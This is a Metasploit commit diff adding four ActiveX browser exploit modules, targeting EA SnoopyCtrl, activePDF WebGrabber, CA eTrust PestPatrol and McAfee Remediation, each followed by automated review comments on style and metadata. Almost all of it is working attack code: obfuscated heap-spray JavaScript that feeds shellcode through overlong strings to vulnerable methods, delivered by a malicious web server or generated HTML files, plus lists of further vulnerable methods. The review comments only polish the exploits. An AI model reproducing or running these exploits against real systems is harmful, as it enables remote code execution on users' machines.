Add the activepdf_webgrabber.rb, etrust_pestscan.rb, ea_checkrequirements.rb and mcafee_hercules_deletesnapshot.rb exploit modules.

git-svn-id: file:///home/svn/framework3/trunk@7167 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Mario Ceballos 2009-10-15 15:22:16 +00:00
parent 5f57666f44
commit 62dc4c74d7
4 changed files with 484 additions and 0 deletions


@ -0,0 +1,115 @@
###
## This file is part of the Metasploit Framework and may be subject to
## redistribution and commercial restrictions. Please see the Metasploit
## Framework web site for more information on licensing and terms of use.
## http://metasploit.com/projects/Framework/
###
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Electronic Arts SnoopyCtrl ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack overflow in Electronic Arts SnoopyCtrl
ActiveX Control (NPSnpy.dll 1.1.0.36. When sending a overly long
string to the CheckRequirements() method, an attacker may be able
to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'MC' ],
'Version' => '$Revision:$',
'References' =>
[
[ 'CVE', '2007-4466' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => '' } ]
],
'DisclosureDate' => 'Oct 8 2007',
'DefaultTarget' => 0))
end
def autofilter
false
end
def check_dependencies
use_zlib
end
def on_request_uri(cli, request)
# Re-generate the payload.
return if ((p = regenerate_payload(cli)) == nil)
# Encode the shellcode.
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
ret = Rex::Text.uri_encode(Metasm::Shellcode.assemble(Metasm::Ia32.new, "or al, 12").encode_string * 2)
js = %Q|
try {
var evil_string = "";
var index;
var vulnerable = new ActiveXObject('SnoopyX.SnoopyCtrl.1');
var my_unescape = unescape;
var shellcode = '#{shellcode}';
#{js_heap_spray}
sprayHeap(my_unescape(shellcode), 0x0c0c0c0c, 0x40000);
for (index = 0; index < 5000; index++) {
evil_string = evil_string + my_unescape('#{ret}');
}
vulnerable.CheckRequirements(evil_string);
} catch( e ) { window.location = 'about:blank' ; }
|
opts = {
'Strings' => true,
'Symbols' => {
'Variables' => [
'vulnerable',
'shellcode',
'my_unescape',
'index',
'evil_string',
]
}
}
js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
js.update_opts(js_heap_spray.opts)
js.obfuscate()
content = %Q|
<html>
<body>
<script><!--
#{js}
//</script>
</body>
</html>
|
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
# Transmit the response to the client
send_response_html(cli, content)
# Handle the payload
handler(cli)
end
end
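Review bot: The Description at lines 26-29 is missing the closing parenthesis after the DLL version and says "a overly long"; it should read `ActiveX Control (NPSnpy.dll 1.1.0.36). When sending an overly long`. In on_request_uri the local `p` assigned from regenerate_payload at line 63 is never read and the `== nil` comparison is unidiomatic: if `payload.encoded` already reflects the regenerated payload, `return unless regenerate_payload(cli)` is the whole guard, otherwise line 65 should be using `p.encoded` and the current code is a latent bug. The single target's `'Ret' => ''` at line 50 is never consulted because the return bytes are assembled inline at line 66, so either drop the key or add a comment saying it is intentionally unused. `js.obfuscate()` at line 96 should be written without the empty parentheses.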


@ -0,0 +1,127 @@
###
## This file is part of the Metasploit Framework and may be subject to
## redistribution and commercial restrictions. Please see the Metasploit
## Framework web site for more information on licensing and terms of use.
## http://metasploit.com/projects/Framework/
###
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'activePDF WebGrabber ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack overflow in activePDF WebGrabber 3.8. When
sending an overly long string to the GetStatus() method of APWebGrb.ocx (3.8.2.0)
an attacker may be able to execute arbitrary code. This control is not marked safe
for scripting, so choose your attack vector accordingly.
},
'License' => MSF_LICENSE,
'Author' => [ 'MC' ],
'Version' => '$Revision:$',
'References' =>
[
[ 'URL', 'http://www.metasploit.com' ],
[ 'URL', 'http://www.activepdf.com/products/serverproducts/webgrabber/' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0A0A0A0A } ]
],
'DisclosureDate' => 'Aug 26 2008',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'msf.html']),
], self.class)
end
def exploit
# Encode the shellcode.
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Create some nops.
nops = Rex::Text.to_unescape(make_nops(4))
# Set the return.
ret = Rex::Text.uri_encode([target.ret].pack('L'))
# Randomize the javascript variable names.
vname = rand_text_alpha(rand(100) + 1)
var_i = rand_text_alpha(rand(30) + 2)
rand1 = rand_text_alpha(rand(100) + 1)
rand2 = rand_text_alpha(rand(100) + 1)
rand3 = rand_text_alpha(rand(100) + 1)
rand4 = rand_text_alpha(rand(100) + 1)
rand5 = rand_text_alpha(rand(100) + 1)
rand6 = rand_text_alpha(rand(100) + 1)
rand7 = rand_text_alpha(rand(100) + 1)
rand8 = rand_text_alpha(rand(100) + 1)
content = %Q|
<html>
<head>
<script>
try {
var #{vname} = new ActiveXObject('APWebGrabber.Object');
var #{rand1} = unescape('#{shellcode}');
var #{rand2} = unescape('#{nops}');
var #{rand3} = 20;
var #{rand4} = #{rand3} + #{rand1}.length;
while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
var #{rand5} = #{rand2}.substring(0,#{rand4});
var #{rand6} = #{rand2}.substring(0,#{rand2}.length - #{rand4});
while (#{rand6}.length + #{rand4} < 0x40000) #{rand6} = #{rand6} + #{rand6} + #{rand5};
var #{rand7} = new Array();
for (#{var_i} = 0; #{var_i} < 400; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + #{rand1} }
var #{rand8} = "";
for (#{var_i} = 0; #{var_i} < 800; #{var_i}++) { #{rand8} = #{rand8} + unescape('#{ret}') }
#{vname}.GetStatus(#{rand8},1);
} catch( e ) { window.location = 'about:blank' ; }
</script>
</head>
</html>
|
content = Rex::Text.randomize_space(content)
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(content)
end
end
=begin
Other methods that are vulnerable.
[id(0x00000050), helpstring("Clean up after a WWWPrint call.")]
void CleanUp(
BSTR ServerIPAddress,
long ServerPort);
[id(0x00000055)]
BSTR Wait(
BSTR IPAddress,
long PortNumber,
short WaitTime,
BSTR AcceptedCommands);
...and probably more.
=end
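Review bot: The References list at line 140 carries `[ 'URL', 'http://www.metasploit.com' ]`, which is a placeholder rather than an advisory and gives anyone triaging this module nothing to correlate against; replace it with the vendor advisory or a CVE/OSVDB/BID entry if one exists, or drop it. The same placeholder appears in the eTrust (line 251) and McAfee (line 345) sections. The JavaScript builder in `exploit` (lines 166-205) is repeated nearly verbatim in those two modules, differing only in the control identifier, the method invoked and the loop count at line 199; a shared helper would keep the three copies from drifting apart as they are patched. The trailing `=begin`/`=end` block is useful documentation but should say where the method list was taken from, e.g. `Other methods in the type library that take a BSTR and may be affected (unverified):`.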


@ -0,0 +1,103 @@
###
## This file is part of the Metasploit Framework and may be subject to
## redistribution and commercial restrictions. Please see the Metasploit
## Framework web site for more information on licensing and terms of use.
## http://metasploit.com/projects/Framework/
###
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'CA eTrust PestPatrol ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack overflow in CA eTrust PestPatrol. When
sending an overly long string to the Initialize() property of ppctl.dll (5.6.7.9)
an attacker may be able to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'MC' ],
'Version' => '$Revision:$',
'References' =>
[
[ 'URL', 'http://www.metasploit.com' ],
[ 'URL', 'http://www.my-etrust.com/Extern/RoadRunner/PestScan/scan.htm' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0A0A0A0A } ]
],
'DisclosureDate' => 'Jun 5 2007',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'msf.html']),
], self.class)
end
def exploit
# Encode the shellcode.
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Create some nops.
nops = Rex::Text.to_unescape(make_nops(4))
# Set the return.
ret = Rex::Text.uri_encode([target.ret].pack('L'))
# Randomize the javascript variable names.
vname = rand_text_alpha(rand(100) + 1)
var_i = rand_text_alpha(rand(30) + 2)
rand1 = rand_text_alpha(rand(100) + 1)
rand2 = rand_text_alpha(rand(100) + 1)
rand3 = rand_text_alpha(rand(100) + 1)
rand4 = rand_text_alpha(rand(100) + 1)
rand5 = rand_text_alpha(rand(100) + 1)
rand6 = rand_text_alpha(rand(100) + 1)
rand7 = rand_text_alpha(rand(100) + 1)
rand8 = rand_text_alpha(rand(100) + 1)
content = %Q|
<html>
<object id='#{vname}' classid='clsid:5E644C49-F8B0-4E9A-A2ED-5F176BB18CE6'></object>
<script language="JavaScript">
var #{rand1} = unescape('#{shellcode}');
var #{rand2} = unescape('#{nops}');
var #{rand3} = 20;
var #{rand4} = #{rand3} + #{rand1}.length;
while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
var #{rand5} = #{rand2}.substring(0,#{rand4});
var #{rand6} = #{rand2}.substring(0,#{rand2}.length - #{rand4});
while (#{rand6}.length + #{rand4} < 0x40000) #{rand6} = #{rand6} + #{rand6} + #{rand5};
var #{rand7} = new Array();
for (#{var_i} = 0; #{var_i} < 400; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + #{rand1} }
var #{rand8} = "";
for (#{var_i} = 0; #{var_i} < 14500; #{var_i}++) { #{rand8} = #{rand8} + unescape('#{ret}') }
#{vname}.Initialize(#{rand8});
</script>
</html>
|
content = Rex::Text.randomize_space(content)
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(content)
end
end
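Review bot: The Description at line 243 calls Initialize() a property, but the script at line 309 invokes it as a method with a string argument; `sending an overly long string to the Initialize() method of ppctl.dll (5.6.7.9)` matches the code. Unlike the sibling modules in this commit, the script here is not wrapped in the try/catch they use; if that is deliberate because the control is loaded through an `<object>` tag rather than ActiveXObject, a short comment in `exploit` saying so would stop the next reader from "fixing" it. The `<script language="JavaScript">` attribute at line 296 is inconsistent with the bare `<script>` tags in the other three modules.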


@ -0,0 +1,139 @@
###
## This file is part of the Metasploit Framework and may be subject to
## redistribution and commercial restrictions. Please see the Metasploit
## Framework web site for more information on licensing and terms of use.
## http://metasploit.com/projects/Framework/
###
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'McAfee Remediation Client ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack overflow in McAfee Remediation Agent 4.5.0.41. When
sending an overly long string to the DeletSnapshot() method
of enginecom.dll (3.7.0.9) an attacker may be able to execute arbitrary code.
This control is not marked safe for scripting, so choose your attack vector accordingly.
},
'License' => MSF_LICENSE,
'Author' => [ 'MC' ],
'Version' => '$Revision:$',
'References' =>
[
[ 'URL', 'http://www.metasploit.com' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0A0A0A0A } ]
],
'DisclosureDate' => 'Aug 4 2008',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'msf.html']),
], self.class)
end
def exploit
# Encode the shellcode.
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Create some nops.
nops = Rex::Text.to_unescape(make_nops(4))
# Set the return.
ret = Rex::Text.uri_encode([target.ret].pack('L'))
# Randomize the javascript variable names.
vname = rand_text_alpha(rand(100) + 1)
var_i = rand_text_alpha(rand(30) + 2)
rand1 = rand_text_alpha(rand(100) + 1)
rand2 = rand_text_alpha(rand(100) + 1)
rand3 = rand_text_alpha(rand(100) + 1)
rand4 = rand_text_alpha(rand(100) + 1)
rand5 = rand_text_alpha(rand(100) + 1)
rand6 = rand_text_alpha(rand(100) + 1)
rand7 = rand_text_alpha(rand(100) + 1)
rand8 = rand_text_alpha(rand(100) + 1)
content = %Q|
<html>
<head>
<script>
try {
var #{vname} = new ActiveXObject('Enginecom.imagineLANEngine.1');
var #{rand1} = unescape('#{shellcode}');
var #{rand2} = unescape('#{nops}');
var #{rand3} = 20;
var #{rand4} = #{rand3} + #{rand1}.length;
while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
var #{rand5} = #{rand2}.substring(0,#{rand4});
var #{rand6} = #{rand2}.substring(0,#{rand2}.length - #{rand4});
while (#{rand6}.length + #{rand4} < 0x40000) #{rand6} = #{rand6} + #{rand6} + #{rand5};
var #{rand7} = new Array();
for (#{var_i} = 0; #{var_i} < 400; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + #{rand1} }
var #{rand8} = "";
for (#{var_i} = 0; #{var_i} < 1024; #{var_i}++) { #{rand8} = #{rand8} + unescape('#{ret}') }
#{vname}.DeleteSnapshot(#{rand8});
} catch( e ) { window.location = 'about:blank' ; }
</script>
</head>
</html>
|
content = Rex::Text.randomize_space(content)
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(content)
end
end
=begin
Other vulnerable method's:
[id(0x0000000c), helpstring("method CreateSnapFromDefaultProfile")]
void CreateSnapFromDefaultProfile(BSTR szDescription);
[id(0x00000013), helpstring("method CreateReportOfSysInfoDifferences")]
void CreateReportOfSysInfoDifferences(
BSTR szOldSnapFile,
BSTR szNewSnapFile,
BSTR szOutFile,
short format,
short append);
[id(0x0000000f), helpstring("method CreateReportOfSnapshotDifferences")]
void CreateReportOfSnapshotDifferences(
BSTR szOldSnapFile,
BSTR szNewSnapFile,
BSTR szOutFile,
short format);
[id(0x00000012), helpstring("method CreateReportOfAssetDifferences")]
void CreateReportOfAssetDifferences(
BSTR szOldSnapFile,
BSTR szNewSnapFile,
BSTR szOutFile,
short format,
BSTR pszAsset,
short append);
=end
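Review bot: The Description at line 336 names the method `DeletSnapshot()` while the script at line 404 calls `DeleteSnapshot`; it should read `sending an overly long string to the DeleteSnapshot() method` so that searches on the real method name find this module. The 'Name' at line 333 says "McAfee Remediation Client" while the description at line 335 says "McAfee Remediation Agent 4.5.0.41" — presumably the same product, but the two strings should agree on one name. In the trailing `=begin` block, `Other vulnerable method's:` should be `Other vulnerable methods:`, and the list would be more useful with a note on whether each entry was confirmed or only inferred from the type library.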